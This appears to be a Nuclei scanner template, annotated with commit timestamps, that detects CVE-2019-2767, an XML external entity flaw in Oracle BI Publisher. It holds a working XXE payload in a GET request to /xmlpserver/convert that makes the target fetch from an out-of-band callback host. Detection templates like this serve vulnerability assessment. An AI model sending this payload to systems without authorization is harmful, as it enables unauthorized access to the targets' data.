2021-06-08 16:19:35 +00:00
id : CVE-2019-2767
info :
2022-07-26 13:45:11 +00:00
name : Oracle Business Intelligence Publisher - XML External Entity Injection
2021-06-08 16:19:35 +00:00
author : madrobot
severity : high
2022-07-26 13:45:11 +00:00
description : Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can exploit this vulnerability to gain unauthorized access to sensitive information or disrupt the availability of the system.
2023-09-06 12:53:28 +00:00
remediation : |
Apply the latest security patches provided by Oracle to fix this vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://www.exploit-db.com/exploits/46729
2022-05-17 09:18:12 +00:00
- http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/vah13/Oracle-BI-bugs
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.2
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-2767
2023-07-11 19:49:27 +00:00
epss-score : 0.14972
2024-06-07 10:04:29 +00:00
epss-percentile : 0.95807
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : oracle
product : bi_publisher
2024-01-14 09:21:50 +00:00
tags : cve,cve2019,edb,oracle,xxe,oast
2021-06-08 16:19:35 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-06-08 16:22:58 +00:00
- raw :
- |
2021-06-08 16:29:59 +00:00
GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
2021-06-08 16:22:58 +00:00
Host : {{Hostname}}
2021-06-08 16:19:35 +00:00
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : interactsh_protocol # Confirms the HTTP Interaction
2021-06-08 16:19:35 +00:00
words :
2021-07-03 19:11:57 +00:00
- "http"
2024-06-08 16:02:17 +00:00
# digest: 4a0a00473045022100ab53a30541dfa06c226087687709439be0aad2b92957273557b87fb5324093d40220468aa50188a9aef751c4da2d9a67d2d9b3e9d4cba73a2b0b43802ea1eb77db0b:922c64590222798bb761d5b6d8e72950